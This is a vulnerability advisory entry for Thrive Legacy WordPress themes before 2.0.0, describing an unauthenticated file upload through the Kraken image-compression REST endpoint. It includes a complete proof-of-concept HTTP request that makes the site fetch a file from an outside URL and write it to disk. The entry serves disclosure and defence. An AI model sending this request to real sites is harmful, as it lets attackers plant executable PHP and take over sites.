All Thrive Themes Legacy Themes < 2.0.0 - Unauthenticated Arbitrary File Upload and Option Deletion
Description
Thrive “Legacy” themes register a REST API endpoint to compress images using the Kraken image optimization engine. By supplying a crafted request in combination with data inserted using the Option Update vulnerability, it was possible to use this endpoint to retrieve malicious code from a remote URL and overwrite an existing file on the site with it or create a new file.This includes executable PHP files that contain malicious code.
Proof of Concept
POST /wp-json/thrive/kraken HTTP/1.1
Host: [URL]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 104
{"id":"td_optin_webhook","results":{"http:\/\/key":{"kraked_url":"https:\/\/ramgall.com\/license.txt"}}} Affects Themes
Classification
Type
UPLOAD
CWE
Miscellaneous
Original Researcher
Chloe Chamberland, Ram Gall, Charles Sweethill
Submitter
Chloe Chamberland, Ram Gall, Charles Sweethill
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-03-24 (about 10 months ago)
Added
2021-03-24 (about 10 months ago)
Last Updated
2021-03-31 (about 9 months ago)